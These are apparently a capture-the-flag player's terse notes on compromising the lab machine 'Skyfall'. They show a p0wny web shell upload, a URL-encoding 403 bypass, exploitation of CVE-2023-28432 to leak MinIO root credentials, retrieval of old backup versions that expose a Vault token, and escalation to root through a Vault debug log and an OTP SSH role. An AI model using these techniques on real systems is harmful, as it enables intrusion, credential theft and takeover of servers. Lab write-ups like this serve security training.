Â
22,80
echo "10.129.46.127 skyfall.htb demo.skyfall.htb" >> /etc/hosts
found a login page
by subdomain recon, there is only
demo.skyfall.htb
foundlogin as the default guest user ,
guest:guest
found a page allows file uploading
upload a p0wny shell
Decode the token (flask-unsign)
flask-unsign --decode --cookie '.eJwljrtuwzAMAP9FcweJFGkyP2OILyQo0AJ2MhX997joeHfL_bS9jjzv7fY8XvnR9ke0W0OcSwdToSuTO_cROTJlUPDWCw1qcSiSgCgLdprosvCK2N1UwNVXWaVSCiR5FEsAMGRfBkvLOB1QwtAsaxsmwX2bbjFHu0ZeZx7_N3_o51H78_szvy7RKxAoVV1yKgB0BF5jm0EFyrnmRqtwtN837cU_Ww.ZcBFsg.HQ1BL9UFQKkpHzFXrYmlq1fez-k'
{'_fresh': True, '_id': '334a9165f3c965cc601de1ee815d670f3b2fa6d93582896830543c8a367030cb982c9cafbfe95e82e5cdf68d2262e0ab2a9fb6ec238db3bbef71b8d6074cbd41', '_user_id': '1', 'csrf_token': '0fd325e99c8e492220326a174d5f296ea475af31'}
don’t have secret key , so this comes useless
Download. There is no access point found to access the path of my shell.
S3 operation failed; code: NoSuchKey, message: The specified key does not exist., resource: /guest//etc/passwd, request_id: 17B0DB3B8407FCA5, host_id: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, bucket_name: guest, object_name: etc/passwd
seems AWS cloud pentesting. And it only shows S3 interface.
gobuster shows /metrics under demo.skyfall.htb, but it’s 403 forbidden
403 bypass:
http://demo.skyfall.htb/metrics%0a
get a endpoint : http://prd23-s3-backend.skyfall.htb/minio/v2/metrics/cluster
CVE-2023-28432
acheiii • Updated Feb 27, 2024
vulnerable url:
by exploit this
MinioEnv":{"MINIO_ACCESS_KEY_FILE":"access_key","MINIO_BROWSER":"off","MINIO_CONFIG_ENV_FILE":"config.env","MINIO_KMS_SECRET_KEY_FILE":"kms_master_key","MINIO_PROMETHEUS_AUTH_TYPE":"public","MINIO_ROOT_PASSWORD":"GkpjkmiVmpFuL2d3oRx0","MINIO_ROOT_PASSWORD_FILE":"secret_key","MINIO_ROOT_USER":"5GrE1B2YGGyZzNHZaIww","MINIO_ROOT_USER_FILE":"access_key","MINIO_SECRET_KEY_FILE":"secret_key","MINIO_UPDATE":"off","MINIO_UPDATE_MINISIGN_PUBKEY":"RWTx5Zr1tiHQLwG9keckT0c45M3AGeHD6IvimQHpyRywVWGbP1aVSGav"}}
i got this
5GrE1B2YGGyZzNHZaIww GkpjkmiVmpFuL2d3oRx0
Use minIO
minio
minio • Updated May 5, 2024
wget https://dl.min.io/client/mc/release/linux-amd64/mc -O /bin/mc chmod +x /bin/mc
find all instruction here here:
mc alias set user http://prd23-s3-backend.skyfall.htb 5GrE1B2YGGyZzNHZaIww GkpjkmiVmpFuL2d3oRx0
mc find user
by enumeration, i found a backup file under user/askyy
download then extract file
nothing found
mc ls --versions user/askyy/home_backup.tar.gz
found several versions of the backup file
mc cp --vid 3c498578-8dfe-43b7-b679-32a3fe42018f user/askyy/home_backup.tar.gz ./
mc cp --vid 2b75346d-2a47-4203-ab09-3c9f878466b8 user/askyy/home_backup.tar.gz ./backup2.tar.gz
Â
found in .bashrc
export VAULT_API_ADDR="http://prd23-vault-internal.skyfall.htb" export VAULT_TOKEN="hvs.CAESIJlU9JMYEhOPYv4igdhm9PnZDrabYTobQ4Ymnlq1qY-LGh4KHGh2cy43OVRNMnZhakZDRlZGdGVzN09xYkxTQVE"
export VAULT_ADDR="http://prd23-vault-internal.skyfall.htb" export VAULT_TOKEN="hvs.CAESIJlU9JMYEhOPYv4igdhm9PnZDrabYTobQ4Ymnlq1qY-LGh4KHGh2cy43OVRNMnZhakZDRlZGdGVzN09xYkxTQVE"
vault login
curl \ --header "X-Vault-Token: $VAULT_TOKEN" \ --request POST \ --data '{"ip":"10.129.46.127", "username":"askyy"}' \ $VAULT_ADDR/v1/ssh/creds/dev_otp_key_role
create a account, and set it to be otp role:
get an OTP
4681b9b6-3093-5e2b-0c27-2c23f293e4bf
successfully login.
367 -rw------- 1 root root 2.9K Feb 5 12:52 debug.log
a debug.log file generated by
-d
parametercreate a new file named
debug.log
, gives all permissionThen run the debug mode
get the master token
hvs.I0ewVsmaKU1SwVZAKR3T0mmG
export VAULT_ADDR='http://prd23-vault-internal.skyfall.htb' export VAULT_TOKEN="hvs.I0ewVsmaKU1SwVZAKR3T0mmG"
vault write ssh/roles/dev_opt_key_role \ key_type=otp \ default_user=root \ cidr_list=10.129.46.127/32
vault write ssh/creds/dev_opt_key_role \ ip=10.129.46.127 \ username=root
get the root~~